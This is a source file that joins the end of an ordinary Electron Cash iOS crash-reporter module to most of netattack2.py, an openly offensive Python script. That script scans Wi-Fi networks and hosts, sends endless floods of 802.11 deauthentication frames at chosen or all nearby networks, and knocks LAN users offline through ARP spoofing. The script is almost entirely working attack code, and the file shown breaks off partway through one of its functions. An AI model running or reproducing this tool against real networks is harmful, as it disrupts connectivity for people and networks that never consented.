                                              _('Sorry!') + " " + _('Something went wrong running Electron Cash.') + " " + _('To help us diagnose and fix the problem, you can send us a bug report that contains useful debug information:').translate({ord(':'):None}),
                                              font = UIFont.italicSystemFontOfSize_(12.0)
                                              )
        self.descDel.placeholderFont = UIFont.italicSystemFontOfSize_(14.0)
        self.descDel.font = UIFont.systemFontOfSize_(14.0)
        self.descDel.placeholderText = _('Tap to enter text...')
        self.descDel.text = ""
        self.title = _('Crash Reporter')
    @objc_method
    def viewWillAppear_(self, animated : bool) -> None:
        send_super(__class__, self, 'viewWillAppear:', animated, argtypes=[c_bool])
        # Auto-scroll the scroll view when the keyboard appears.
        self.kbas = utils.register_keyboard_autoscroll(self.sv)
        # Below will be enabled if we have valid exception info
        self.sendBut.setEnabled_(False)
        utils.uiview_set_enabled(self.sendBut, False)
    @objc_method
    def viewWillDisappear_(self, animated : bool) -> None:
        send_super(__class__, self, 'viewWillDisappear:', animated, argtypes=[c_bool])
        if self.kbas:
            utils.unregister_keyboard_autoscroll(self.kbas)
            self.kbas = 0
    @objc_method
    def viewDidAppear_(self, animated : bool) -> None:
        """Render the report preview and enable Send once exc_info exists."""
        send_super(__class__, self, 'viewDidAppear:', animated, argtypes=[c_bool])
        ei = _Get(self)
        if ei:
            self.report.attributedText = utils.nsattributedstring_from_html(_get_report_string(self))
            self.sendBut.setEnabled_(True)
            utils.uiview_set_enabled(self.sendBut, True)
    @objc_method
    def onSendBut_(self, sender) -> None:
        """Send the crash report to report_server in a waiting dialog."""
        def SendReport() -> str:
            # Runs off-main in utils.WaitingDialog; returns the server reply.
            reportDict = _get_traceback_info(self)
            reportDict.update(_get_additional_info(self))
            report = json.dumps(reportDict)
            #reportPretty = json.dumps(reportDict, indent=4)
            #utils.NSLog("Report contents: %s", reportPretty)
            response = requests.post(report_server, data=report)
            return response.text
        def onOk() -> None: self.presentingViewController.dismissViewControllerAnimated_completion_(True, None)
        def OnSuccess(response : str) -> None:
            utils.NSLog("Response from server: %s", response)
            response = response.strip()
            if len(response) > 255: response = response[:255] + "..."
            try:
                # The server may answer with HTML; reduce it to plain text.
                response = str(utils.nsattributedstring_from_html(response).string)
            except:
                pass
            parent().show_message(message = response, title=_("Report Sent"), vc = self, onOk=onOk)
        def OnError(exc) -> None:
            # exc is an exc_info-style tuple; show its value.
            parent().show_error(message = str(exc[1]), vc = self)
        utils.WaitingDialog(self, _("Sending Report..."), SendReport, OnSuccess, OnError)
def _Get(vc: CrashReporterVC) -> tuple:
    """Return the (type, value, traceback) tuple attached to *vc*, if any."""
    exc_info = utils.nspy_get_byname(vc, 'exc_info')
    return exc_info
def Set(vc : CrashReporterVC, exc_info : tuple) -> None:
    """Attach an exc_info tuple to *vc* for later display and reporting."""
    key = 'exc_info'
    utils.nspy_put_byname(vc, exc_info, key)
def parent() -> object:
    """Return the running ElectrumGui application object."""
    app = gui.ElectrumGui.gui
    return app
def _get_traceback_info(vc : CrashReporterVC) -> dict:
    """Summarize vc's stored exc_info as a JSON-friendly dict.

    Returns an empty dict when no exception is attached.
    """
    exc_info = _Get(vc)
    if not exc_info:
        return dict()
    frames = traceback.extract_tb(exc_info[2])
    return {
        "exc_string": str(exc_info[1]),
        "stack": "".join(traceback.format_list(frames)),
        # Identify the crash by its innermost frame and exception type.
        "id": {
            "file": frames[-1].filename,
            "name": frames[-1].name,
            "type": exc_info[0].__name__,
        },
    }
def _get_additional_info(vc : CrashReporterVC) -> dict:
    """Collect environment metadata (versions, OS, wallet type, locale).

    Returns the dict used both for the report preview and the POSTed
    JSON payload. Never raises: wallet lookup is best-effort.
    """
    import platform
    bundleVer = "iOS Build: " + str(NSBundle.mainBundle.objectForInfoDictionaryKey_("CFBundleVersion"))
    #xtraInfo = bundleVer + "\niOS Version String: " + utils.ios_version_string() + "\n\n"
    args = {
        "app_version": PACKAGE_VERSION + (" (%s)"%bundleVer),
        "python_version": sys.version,
        "os": platform.platform() + " " + utils.ios_version_string(),
        "wallet_type": "unknown",
        "locale": (parent().language or 'UNK'),
        "description": (vc.descDel.text if vc.descDel.text else "")
    }
    # The crash server limits field lengths; keep "os" within 255 chars.
    if len(args['os']) > 255:
        args['os'] = args['os'][:255]
    try:
        args["wallet_type"] = parent().wallet.wallet_type
    except Exception:
        # Was a bare `except:`, which would also swallow SystemExit and
        # KeyboardInterrupt. Maybe the wallet isn't loaded yet -- keep the
        # "unknown" default in that case.
        pass
    return args
def _get_report_string(vc : CrashReporterVC) -> str:
    """Render the HTML report preview; '' when no exc_info is attached."""
    fields = _get_additional_info(vc)
    exc_info = _Get(vc)
    if not exc_info:
        return ""
    fields["traceback"] = "".join(traceback.format_exception(*exc_info))
    return issue_template.format(**fields)
'''
th = None
def Test():
# testing
import time
def duh() -> None:
raise Exception("A random exception!!")
utils.call_later(2.0, duh)
utils.call_later(3.0, duh)
#utils.call_later(10.0, duh)
def duh2() -> None:
global th
def thrd():
global th
try:
utils.NSLog("In another thread.. sleeping 5 secs")
print(th)
time.sleep(5.0)
utils.NSLog("Woke up.. raising exception...")
raise Exception("From another thread!!")
finally:
th = None
import threading
th = threading.Thread(target=thrd, name="Exception thread...", daemon=True)
th.start()
utils.call_later(5.0, duh2)
'''
|
netattack2.py | #!/usr/bin/env python
import os
import sys
import socket
import logging
from threading import Thread
import socket
from time import sleep
from subprocess import Popen, PIPE
# COLORS: ANSI escape codes — blue, red, yellow, green, reset.
B, R, Y, G, N = '\33[94m', '\033[91m', '\33[93m', '\033[1;32m', '\033[0m'
# making scapy quiet
logging.getLogger('scapy.runtime').setLevel(logging.ERROR)
try:
    # Third-party requirements; bail out with a hint to the README if missing.
    import nmap
    import argparse
    from scapy.all import *
except:
    print('\n{0}ERROR: Please install all requirements (README)!\n'.format(R))
    sys.exit(1)
# making scapy quiet
conf.verb = 0
try:
    # check for root privileges
    if os.geteuid() != 0:
        print('\n{0}ERROR: Netattack needs to be started as a super user (root privileges).\n'.format(R))
        sys.exit(1)
# geteuid() throws error on windows
except:
    print('\n{0}ERROR: If you\'re using Windows, please start Netattack under Linux.\n'.format(R))
    sys.exit(1)
def print_banner():
    """Clear the screen and print the animated NETATTACK banner."""
    # IF THE ANIMATION AT THE BEGINNING PISSES YOU OFF, SIMPLY REMOVE sleep(x) :)
    os.system('clear')
    print('''{0}{1}
O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O
O O O O O O O O O O O O O O
O O O O O O O O O O O O O O
O O O O O O O O O O O O O O O O O
O O O O O O O O O O O O O O O O O O O O
O O O O O O O O O O O O O O
O O O O O O O O O O O O O O O O O O O O'''.format('\n' * 1, G))
    sleep(0.7)
    print('''\n\n{0}{1}D I S C O V E R W H A T 'S P O S S I B L E'''.format(' '*40, Y))
    sleep(0.4)
    print('''{0}{1}b y c h r i z a t o r{2}{3}'''.format(' '*53, R, N, '\n' * 1))
    sleep(0.4)
def get_choice():
    """Print the main menu and return the user's validated option (1-9).

    The result is also stored in the module-level ``choice`` global,
    which handle_choice() reads.
    """
    global choice
    print('''
{0}-----------
| S C A N |
-----------{4}
{2}({1}1{2}) {4}Scan for Access-Points
{2}({1}2{2}) {4}Scan for hosts in your network
{0}---------------
| A T T A C K |
---------------{4}
{5}DEAUTH
{2}({1}3{2}) {4}Deauth ONE network
{2}({1}4{2}) {4}Deauth MULTIPLE networks
{2}({1}5{2}) {4}Deauth ALL networks in your area
{5}KICK
{2}({1}6{2}) {4}Kick ONE user off your network
{2}({1}7{2}) {4}Kick MULTIPLE users off your network
{2}({1}8{2}) {4}Kick ALL users off your network (except you)
{2}({1}9{2}) {4}EXIT{3}'''.format(G, Y, R, '\n' * 3, N, B))
    # Loop (instead of the old recursion-with-fallthrough) until the input
    # is a valid menu option. The menu offers options 1-9, so the old check
    # `choice not in range(1, 11)` wrongly accepted the nonexistent 10.
    while True:
        try:
            choice = int(input('{0}{1}#{2}> {3}'.format(B, ' ' * 4, R, N)))
        except KeyboardInterrupt:
            print('\n{0}Thanks for using NETATTACK! See you later!'.format(G))
            sys.exit(1)
        except ValueError:
            print('{0}ERROR: Your input was incorrect.'.format(R))
            continue
        if choice not in range(1, 10):
            print('{0}ERROR: Your input was incorrect.'.format(R))
            continue
        return choice
def handle_choice():
    """Dispatch the menu option previously stored in the global ``choice``."""
    if choice == 9:
        print('{0}Thanks for using NETATTACK! See you later!'.format(G))
        sys.exit(0)
    # Table-driven dispatch instead of an if/elif chain; exactly one action
    # runs per call, same as before.
    actions = {
        1: lambda: wifi_scan(True, False, True),
        2: lambda: host_scan(True, True, False, True),
        3: deauth_one,
        4: deauth_multiple,
        5: deauth_all,
        6: kick_one,
        7: kick_multiple,
        8: kick_all,
    }
    action = actions.get(choice)
    if action is not None:
        action()
def get_iface():
    """Ask the user to pick a network interface and return its name.

    Lists /sys/class/net entries as a numbered menu; falls back to manual
    entry when the listing fails.
    """
    os.system('clear')
    iface_dict = {}
    try:
        interfaces = os.listdir('/sys/class/net/')
    except:
        # Cannot enumerate interfaces (e.g. non-Linux): ask for the name.
        print('{0}ERROR: Unable to detect interfaces. Please type interface-name manually.'.format(R))
        try:
            iface = raw_input('\n{0}Interface-Name {1}#{2}>{3} '.format(G, B, R, N))
        except:
            print('\n{0}Thanks for using NETATTACK! See you later!'.format(G))
            sys.exit(1)
        if len(iface) > 0:
            return iface
        # BUGFIX: the original printed '{0nERROR: ...' -- an invalid format
        # spec that raised ValueError. Also exit here: with no interface
        # listing available there is nothing left to offer.
        print('{0}ERROR: Your input was incorrect.\n'.format(R))
        sys.exit(1)
    print('{0}Please choose an interface that fits your action (wireless, wired...):{1}'.format(G, '\n' * 1))
    num = 1
    for iface in interfaces:
        print('{0}{1}({4}{3}{1}) {2}{5}'.format(' ' * 4, R, N, str(num), Y, iface))
        iface_dict[num] = iface
        num += 1
    print('\n')
    # Loop instead of the old recursion; re-ask until a listed number is given.
    while True:
        try:
            iface_choice = int(raw_input('{0}{1}#{2}>{3} '.format(B, ' '*4, R, N)))
        except KeyboardInterrupt:
            print('\n{0}Thanks for using NETATTACK! See you later!'.format(G))
            sys.exit(1)
        except:
            print('{0}ERROR: Your input was incorrect.'.format(R))
            continue
        if iface_choice not in iface_dict:
            print('{0}ERROR: Your input was incorrect.'.format(R))
            continue
        return iface_dict[iface_choice]
def get_gateway():
    """Return the default gateway's IPv4 address as a string.

    Sends a TTL-0 ICMP packet toward google.com; the first hop (the
    gateway) replies, and its source address is the gateway IP. On any
    failure, falls back to asking the user.
    """
    try:
        gateway_pkt = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=False)
        return gateway_pkt.src
    except:
        os.system('clear')
        print('{0}ERROR: Script is unable to retrieve Gateway-IP address.\nPlease type in manually.\n'.format(R))
        try:
            gateway_ip = raw_input('\n{0}Gateway-IP {1}#{2}>{3} '.format(G, B, R, N))
        except(KeyboardInterrupt):
            print('\n{0}Thanks for using NETATTACK! See you later!'.format(G))
            sys.exit(1)
        return gateway_ip
def get_gateway_mac(IP):
    """Resolve the MAC address of *IP* (the gateway) via an nmap ping scan.

    Falls back to manual entry when the scan finds no 'up' host with a MAC.
    """
    nm = nmap.PortScanner()
    x = nm.scan(hosts=IP, arguments='-sP')
    # .iteritems() — this file targets Python 2.
    for k, v in x['scan'].iteritems():
        if str(v['status']['state']) == 'up':
            return str(v['addresses']['mac'])
    os.system('clear')
    print('{0}ERROR: Script is unable to retrieve Gateway-MAC address. \nPlease type in manually.\n'.format(R))
    gateway_mac = raw_input('\n{0}Gateway-MAC {1}#{2}>{3} '.format(G, B, R, N))
    return gateway_mac
def enable_monitor_mode(iface):
    """Put *iface* into 802.11 monitor mode (down -> mode monitor -> up)."""
    commands = (
        'ifconfig {0} down',
        'iwconfig {0} mode monitor',
        'ifconfig {0} up',
    )
    try:
        for template in commands:
            os.system(template.format(iface))
    except:
        print('{0}INTERFACE ERROR'.format(R))
        sys.exit(1)
def disable_monitor_mode(iface):
    """Return *iface* to normal managed mode (down -> mode managed -> up)."""
    for template in ('ifconfig {0} down',
                     'iwconfig {0} mode managed',
                     'ifconfig {0} up'):
        os.system(template.format(iface))
def wifi_scan(do_output, do_deauth, verbose, iface=None):
    """Sniff beacon/probe-response frames and collect APs into global ``APs``.

    :param do_output: print each newly found AP (when do_print_ap is set).
    :param do_deauth: True when called from deauth_all (skips screen clear).
    :param verbose: print the "turning on monitoring" notice.
    :param iface: interface to use; asks the user when None.
    Blocks in scapy's sniff(); runs channel hopping in a daemon thread.
    """
    global ID
    def packet_handler(pkt):
        # Called by sniff() for every beacon / probe response.
        global ID
        bssid = pkt.addr2
        essid = pkt.info
        enc = None
        channel = None
        cap = pkt.sprintf('{Dot11Beacon:%Dot11Beacon.cap%}'
                          '{Dot11ProbeResp:%Dot11ProbeResp%}')
        elt = pkt[Dot11Elt]
        if bssid not in APs:
            # Walk the chain of information elements to find channel and
            # encryption (ID 3 = DS channel, 48 = RSN/WPA2, 221 = WPA1 OUI).
            while isinstance(elt, Dot11Elt):
                if elt.ID == 3:
                    channel = ord(elt.info)
                elif elt.ID == 48:
                    enc = 'WPA2'
                elif elt.ID == 221 and elt.info.startswith('\x00P\xf2\x01\x01\x00'):
                    enc = 'WPA1'
                if not enc:
                    # No WPA IE seen so far: fall back to the privacy capability bit.
                    if 'privacy' in cap:
                        enc = 'WEP'
                    else:
                        enc = 'OPEN'
                elt = elt.payload
            APs[bssid] = {'essid': essid, 'enc': enc, 'channel': channel, 'id': ID}
            ID += 1
            if do_output and do_print_ap:
                output(bssid, essid, enc, channel)
        else:
            return
    def channelhop(iface):
        # Cycle through 802.11 channels 1-13 while the global do_channelhop
        # flag is set; runs forever as a daemon thread.
        channel = 1
        while channel < 14:
            if do_channelhop:
                try:
                    os.system('iwconfig {0} channel {1}'.format(iface, channel))
                except:
                    print('{0}INTERFACE ERROR'.format(R))
                    sys.exit(1)
            sleep(0.1)
            if channel >= 13:
                channel = 1
                continue
            channel += 1
    def output(bssid, essid, enc, channel):
        # Align single-digit channels with double-digit ones.
        channel_space = 2
        if len(str(channel)) == 1:
            channel_space = 3
        print('{0}{1} {2}| {3}{4}| {5}{6} {2}| {7}{8}{2}'.format(R, bssid.upper(), N, str(channel), ' '*channel_space, B, enc, Y, essid))
    # Reset the global AP id counter for this scan.
    ID = 1
    if not iface:
        iface = get_iface()
    if verbose:
        print('\n{0}Turning on {1}MONITORING {0}mode ...{2}'.format(G, R, N))
    enable_monitor_mode(iface)
    os.system('airmon-ng check kill')
    thread_channelhop = Thread(target=channelhop, args=[iface])
    thread_channelhop.daemon = True
    thread_channelhop.start()
    if do_output:
        if not do_deauth:
            os.system('clear')
        print('\n{0}BSSID{1}CH{2}ENC{3}ESSID'.format(N, ' '*17, ' '*5, ' '*6))
    # Blocks here; packet_handler fills the global APs dict.
    sniff(iface=iface, prn=packet_handler, lfilter=lambda x: (Dot11ProbeResp in x or Dot11Beacon in x), store=0)
def host_scan(iface_known, do_output, kick_output, verbose):
    """Ping-scan the local network and return {ip: {mac, name, id}}.

    :param iface_known: skip the interface prompt when True.
    :param do_output: print the result table.
    :param kick_output: include the numeric id column (used by kick_*).
    :param verbose: show the "Scanning..." notice.
    """
    def get_ip_range():
        # Derive a CIDR range from scapy's routing table, skipping loopback
        # and zero routes. Returns e.g. "192.168.0.0/24".
        for net, msk, _, iface, addr in conf.route.routes:
            if iface == 'lo' or addr == '127.0.0.1':
                continue
            if net <= 0 or msk <= 0:
                continue
            sub = utils.ltoa(net)
            cidr = bin(msk).count('1')
            return '{0}/{1}'.format(sub, cidr)
    def ask_for_ip_range(ip_range):
        # Show the auto-detected range (plus our local IP, found by opening
        # a UDP "connection" to 8.8.8.8) and let the user override it.
        os.system('clear')
        print('{0}The script automatically searched for an IP-Range to be scanned.\nPress {1}ENTER {2}to keep it or {3}type in your custom range{4}.{5}'.format(G, R, G, R, G, N))
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            s.connect(("8.8.8.8", 80))
            print('\n{0}{1}Your local IP: {2}{3}{4}'.format(' ' * 4, Y, R, s.getsockname()[0], N))
            s.close()
        except:
            print('\n{0}{1}Your local IP: {2}{3}{4}'.format(' ' * 4, Y, R, 'ERROR', N))
        print('{0}{1}Current IP-Range: {2}{3}{4}'.format(' ' * 4, Y, R, ip_range, N))
        try:
            user_input = raw_input('\n{0}{1}#{2}>{3} '.format(' ' * 4, B, R, N))
        except(KeyboardInterrupt):
            print('\n{0}Thanks for using NETATTACK! See you later!'.format(G))
            sys.exit(1)
        if user_input == '':
            return ip_range
        else:
            return user_input
    def output(hosts):
        # Print the host table; exits the program when nothing was found.
        max_ip_length = 0
        if len(hosts) == 0:
            print('{0}0 hosts are up. :/{1}'.format(R, N))
            sys.exit(0)
        for ip in hosts:
            if len(ip) > max_ip_length:
                max_ip_length = len(ip)
        print('\n')
        for ip in hosts:
            if kick_output is True:
                print(' [{5}{0}{4}] {1}{2}{3}{4}({5}{6}{4}) | {7}{8}{4}'.format(hosts[ip]['id'], Y, ip,' ' * (max_ip_length-len(ip)+1), N, R, hosts[ip]['mac'], B, hosts[ip]['name']))
            else:
                print('{0}{1}{2}{3}({4}{5}{3}) | {6}{7}{3}'.format(Y, ip,' ' * (max_ip_length-len(ip)+1), N, R, hosts[ip]['mac'], B, hosts[ip]['name']))
        print('\n{0}{1}{2} {3}hosts are up. Finished scanning.\n'.format(' '*4, R, len(hosts), G))
    hosts = {}
    if not iface_known:
        iface = get_iface()
        conf.iface = iface
    ip_range = get_ip_range()
    ip_range = ask_for_ip_range(ip_range)
    if verbose:
        os.system('clear')
        print('{0}Scanning your network. Stand by!{1}'.format(G, N))
    ID = 1
    nm = nmap.PortScanner()
    x = nm.scan(hosts=ip_range, arguments='-sP')
    # .iteritems() — this file targets Python 2.
    for k, v in x['scan'].iteritems():
        if str(v['status']['state']) == 'up':
            try:
                MAC = str(v['addresses']['mac'])
                IP = str(v['addresses']['ipv4'])
            except:
                # Host without MAC/IPv4 info (e.g. ourselves): skip it.
                continue
            try:
                NAME = socket.gethostbyaddr(IP)[0]
            except:
                NAME = 'Unknown NAME'
            hosts[IP] = {'mac': MAC, 'name': NAME, 'id': ID}
            ID += 1
    if do_output:
        output(hosts)
    return hosts
def deauth_one():
    """Scan for APs, let the user pick one, then deauth it forever.

    Runs wifi_scan in a daemon thread, prints APs as they are found until
    Ctrl+C, then floods broadcast deauth frames at the chosen BSSID.
    """
    global do_channelhop
    def choice_input():
        # Re-ask until a valid AP id is entered.
        if len(APs) < 1:
            print('{0}No Access-Points found :/{1}\n'.format(R, N))
            sys.exit(1)
        while True:
            try:
                user_input = raw_input('{0}{1}#{2}>{3} '.format(B, ' '*4, R, N))
            except(KeyboardInterrupt):
                print('\n{0}Thanks for using NETATTACK! See you later!'.format(G))
                sys.exit(1)
            try:
                _ = int(user_input)
            except:
                print('{0}ERROR: Your input was incorrect.'.format(R))
                continue
            if _ not in range(1, len(APs)+1) and _ != 1:
                print('{0}ERROR: Your input was incorrect.'.format(R))
                continue
            return _
    def deauth():
        # Lock onto the target's channel and send broadcast deauth frames
        # in bursts of 64 until interrupted.
        print('\n{0}Deauthing ...{1}\n'.format(G, N))
        os.system('iwconfig {0} channel {1}'.format(iface, CHANNEL))
        while True:
            for x in range(64):
                try:
                    send(Dot11(addr1='FF:FF:FF:FF:FF:FF', addr2=BSSID, addr3=BSSID) / Dot11Deauth())
                except(KeyboardInterrupt):
                    print('{0}Deauthing cancelled.{1}'.format(R, N))
                    sys.exit(1)
    iface = get_iface()
    conf.iface = iface
    thread_scan = Thread(target=wifi_scan, args=[False, False, True, iface])
    thread_scan.daemon = True
    thread_scan.start()
    os.system('clear')
    print('\n{0}Scanning for Access-Points. Press {1}Ctrl+C {0}to continue choosing a target.{2}'.format(G, R, N))
    print('\n{0}{4}BSSID{1}CH{2}ENC{3}ESSID'.format(N, ' '*17, ' '*5, ' '*6, ' '*6))
    printed_APs = []
    try:
        # Live-print newly discovered APs until the user hits Ctrl+C.
        while True:
            for bssid in APs.keys():
                if bssid not in printed_APs:
                    channel = APs[bssid]['channel']
                    essid = APs[bssid]['essid']
                    enc = APs[bssid]['enc']
                    ID = APs[bssid]['id']
                    channel_space = 2
                    if len(str(channel)) == 1:
                        channel_space = 3
                    print(' {2}[{7}{9}{2}] {0}{1} {2}| {3}{4}| {5}{6} {2}| {7}{8}{2}'.format(R, bssid.upper(), N, str(channel), ' '*channel_space, B, enc, Y, essid, ID))
                    printed_APs.append(bssid)
    except(KeyboardInterrupt):
        # Stop channel hopping so the deauth stays on the target's channel.
        do_channelhop = False
        pass
    print('\n{0}Choose {1}ONE {0}of the targets listed above.{2}\n'.format(G, R, N))
    chosen_ID = choice_input()
    BSSID, CHANNEL = None, None
    for bssid in APs:
        if APs[bssid]['id'] == chosen_ID:
            BSSID = bssid
            CHANNEL = APs[bssid]['channel']
    deauth()
def deauth_multiple():
    """Scan for APs, let the user pick several (comma separated), deauth them all."""
    global do_channelhop
    def choice_input():
        # Parse a comma-separated list of AP ids; re-ask until valid.
        while True:
            try:
                user_input = raw_input('{0}{1}#{2}>{3} '.format(B, ' '*4, R, N))
            except(KeyboardInterrupt):
                print('\n{0}Thanks for using NETATTACK! See you later!'.format(G))
                sys.exit(1)
            user_input = user_input.replace(' ', '')
            target_list_str = user_input.split(',')
            target_list = []
            try:
                for num in target_list_str:
                    _ = int(num)
            except:
                print('{0}ERROR: Your input was incorrect.'.format(R))
                continue
            for x in target_list_str:
                target_list.append(int(x))
            # NOTE(review): removing from target_list while iterating over it
            # skips elements — adjacent out-of-range ids can slip through.
            # A filtering comprehension would be the safe fix.
            for num in target_list:
                if num < 1 or num > len(APs):
                    target_list.remove(num)
            if len(target_list) <= 1:
                print('{0}ERROR: Your input was incorrect.'.format(R))
                continue
            return target_list
    def deauth():
        # Print the chosen targets, then round-robin over them forever,
        # hopping to each AP's channel and sending 64 deauth frames.
        print('\nDeauth-List:')
        for ID in target_list:
            for bssid in APs:
                if APs[bssid]['id'] == ID:
                    print('{0}{1} {4}| {2}{3}{4}'.format(R, bssid.upper(), Y, APs[bssid]['essid'], N))
        print('\n{0}Deauthing ...\n{1}'.format(G, N))
        while True:
            for ID in target_list:
                for bssid in APs:
                    if APs[bssid]['id'] == ID:
                        os.system('iwconfig {0} channel {1}'.format(iface, APs[bssid]['channel']))
                        for x in range(64):
                            try:
                                send(Dot11(addr1='FF:FF:FF:FF:FF:FF', addr2=bssid, addr3=bssid) / Dot11Deauth())
                            except(KeyboardInterrupt):
                                print('{0}Deauthing cancelled.{1}'.format(R, N))
                                sys.exit(1)
    iface = get_iface()
    conf.iface = iface
    thread_scan = Thread(target=wifi_scan, args=[False, False, True, iface])
    thread_scan.daemon = True
    thread_scan.start()
    os.system('clear')
    print('\n{0}Scanning for Access-Points. Press {1}Ctrl+C {0}to continue choosing a target.{2}'.format(G, R, N))
    print('\n{0}{4}BSSID{1}CH{2}ENC{3}ESSID'.format(N, ' '*17, ' '*5, ' '*6, ' '*6))
    printed_APs = []
    try:
        # Live-print newly discovered APs until the user hits Ctrl+C.
        while True:
            for bssid in APs.keys():
                if bssid not in printed_APs:
                    channel = APs[bssid]['channel']
                    essid = APs[bssid]['essid']
                    enc = APs[bssid]['enc']
                    ID = APs[bssid]['id']
                    channel_space = 2
                    if len(str(channel)) == 1:
                        channel_space = 3
                    print(' {2}[{7}{9}{2}] {0}{1} {2}| {3}{4}| {5}{6} {2}| {7}{8}{2}'.format(R, bssid.upper(), N, str(channel), ' '*channel_space, B, enc, Y, essid, ID))
                    printed_APs.append(bssid)
    except(KeyboardInterrupt):
        do_channelhop = False
        pass
    print('\n\n{0}Choose {1}MULTIPLE {0}targets listed above.\nSeperate each target by tiping \'{1},{0}\'\n{2}'.format(G, R, N))
    target_list = choice_input()
    deauth()
def deauth_all():
    """Alternate forever between scanning (10s every 120s) and deauthing
    every AP found so far. Coordinates with wifi_scan's channel hopper via
    the global do_deauth / do_channelhop / do_print_ap flags.
    """
    global do_deauth, do_channelhop, do_print_ap
    def pause():
        # Daemon thread: every 120s pause deauthing, rescan for 10s with a
        # fresh APs dict, then resume deauthing.
        global do_deauth, do_channelhop, do_print_ap, APs
        while True:
            sleep(120)
            print('\n{0}Scanning ...{1}\n'.format(G, N))
            APs = {}
            do_print_ap = True
            do_channelhop = True
            do_deauth = False
            sleep(10)
            print('\n{0}Deauthing ...{1}\n'.format(G, N))
            do_channelhop = False
            do_deauth = True
            do_print_ap = False
    iface = get_iface()
    conf.iface = iface
    scan_thread = Thread(target=wifi_scan, args=[True, True, False, iface])
    scan_thread.daemon = True
    pause_thread = Thread(target=pause, args=[])
    pause_thread.daemon = True
    os.system('clear')
    print('{0}Scanning for networks each 120s (duration: 10s){1}\n'.format(G, N))
    scan_thread.start()
    pause_thread.start()
    # Initial 10-second discovery window before the first deauth round.
    sleep(10)
    do_channelhop = False
    do_print_ap = False
    print('\n{0}Deauthing ...{1}\n'.format(G, N))
    while True:
        if do_deauth:
            for bssid in APs.keys():
                os.system('iwconfig {0} channel {1}'.format(iface, APs[bssid]['channel']))
                for x in range(2):
                    try:
                        send(Dot11(addr1='FF:FF:FF:FF:FF:FF', addr2=bssid, addr3=bssid) / Dot11Deauth())
                    except(KeyboardInterrupt):
                        print('{0}Deauthing cancelled.{1}'.format(R, N))
                        sys.exit(1)
                    except:
                        # Best-effort: ignore send errors and move on.
                        continue
def restore_kick(targets, gatewayIP, gatewayMAC):
    """Undo ARP spoofing for all kicked hosts, then exit the program.

    Sends 10 rounds of corrective ARP replies in both directions
    (gateway->host and host->gateway) so the poisoned caches heal.

    :param targets: {ip: {'mac': mac}} of previously kicked hosts.
    """
    print('\n\n{0}RESTORING TARGET(S): {1}Don\'t interrupt!{2}'.format(G, R, N))
    for ip in targets:
        IP = ip
        MAC = targets[ip]['mac']
        success = True
        for x in range(10):
            try:
                # Re-announce the true gateway<->host mappings to everyone.
                send(ARP(op=2, pdst=IP, psrc=gatewayIP, hwdst='FF:FF:FF:FF:FF:FF', hwsrc=gatewayMAC))
                send(ARP(op=2, pdst=gatewayIP, psrc=IP, hwdst='FF:FF:FF:FF:FF:FF', hwsrc=MAC))
            except:
                print('{0}ERROR: Can\'t restore {1}{2} {3}({4}{5}{3}). {0}Skipping.'.format(R, Y, MAC, N, B, IP))
                success = False
                pass
            sleep(0.3)
        if success:
            print('{0}{1}Successfully restored: {2}{3} {4}({5}{6}{4})'.format(' ' * 4, G, R, MAC, N, Y, IP))
    print('\n')
    # Terminates the whole program: callers invoke this on Ctrl+C.
    sys.exit(0)
def kick_one():
    """ARP-spoof a single chosen host off the network until Ctrl+C.

    On interrupt, restore_kick() repairs the ARP caches and exits.
    """
    global kick_hosts
    def choice_input():
        # Accept either a host id or 'R' to rescan; re-ask until valid.
        global kick_hosts
        while True:
            try:
                user_input = raw_input('{0}{1}#{2}>{3} '.format(B, ' '*4, R, N))
            except(KeyboardInterrupt):
                print('\n{0}Thanks for using NETATTACK! See you later!'.format(G))
                sys.exit(1)
            if user_input.upper() != 'R':
                try:
                    ID = int(user_input)
                except(KeyboardInterrupt):
                    print('\n{0}Thanks for using NETATTACK! See you later!'.format(G))
                    sys.exit(1)
                except:
                    print('{0}ERROR: Your input was incorrect.'.format(R))
                    continue
                if ID not in range(len(kick_hosts)+1):
                    print('{0}ERROR: Your input was incorrect.'.format(R))
                    continue
                return ID
            else:
                # 'R' pressed: rescan and show the table again.
                kick_hosts = {}
                kick_hosts = host_scan(True, True, True, True)
                print('\n{0}{1}Choose {2}ONE {1}of the hosts listed above or press {2}R {1}for rescan:{3}'.format(' ' * 4, G, R, N))
    def kick():
        # Poison the target's ARP cache every 4 seconds; Ctrl+C restores.
        while True:
            try:
                send(ARP(op=2, psrc=gatewayIP, pdst=IP, hwdst=gatewayMAC))
                sleep(4)
            except(KeyboardInterrupt):
                targets = {}
                targets[IP] = {'mac': MAC}
                restore_kick(targets, gatewayIP, gatewayMAC)
    gatewayIP = get_gateway()
    gatewayMAC = get_gateway_mac(gatewayIP)
    kick_hosts = host_scan(True, True, True, True)
    print('\n{0}{1}Choose {2}ONE {1}of the hosts listed above or press {2}R {1}for rescan:{3}\n'.format(' ' * 4, G, R, N))
    chosen_ID = choice_input()
    MAC, IP, NAME = None, None, None
    for ip in kick_hosts:
        if kick_hosts[ip]['id'] == chosen_ID:
            MAC = kick_hosts[ip]['mac']
            IP = ip
            NAME = kick_hosts[ip]['name']
    os.system('clear')
    print('{0}Currently kicking: {1}{2} {3}| {4}{5} {3}| {6}{7}{3}'.format(G, R, MAC, N, Y, IP, B, NAME))
    kick()
def kick_multiple():
    """ARP-spoof several chosen hosts off the network until Ctrl+C.

    On interrupt, restore_kick() repairs the ARP caches and exits.
    """
    global kick_hosts
    def choice_input():
        # Accept a comma-separated id list or 'R' to rescan; re-ask until valid.
        global kick_hosts
        while True:
            try:
                user_input = raw_input('{0}{1}#{2}>{3} '.format(B, ' '*4, R, N))
            except(KeyboardInterrupt):
                print('\n{0}Thanks for using NETATTACK! See you later!'.format(G))
                sys.exit(1)
            if user_input.upper() != 'R':
                user_input = user_input.replace(' ', '')
                target_list_str = user_input.split(',')
                target_list = []
                try:
                    for num in target_list_str:
                        _ = int(num)
                except:
                    print('{0}ERROR: Your input was incorrect.'.format(R))
                    continue
                for x in target_list_str:
                    target_list.append(int(x))
                # NOTE(review): removing from target_list while iterating over
                # it skips elements — adjacent invalid ids can slip through.
                for num in target_list:
                    if num < 1 or num > len(kick_hosts):
                        target_list.remove(num)
                if len(target_list) <= 1:
                    print('{0}ERROR: Your input was incorrect.'.format(R))
                    continue
                return target_list
            else:
                # 'R' pressed: rescan and show the table again.
                kick_hosts = {}
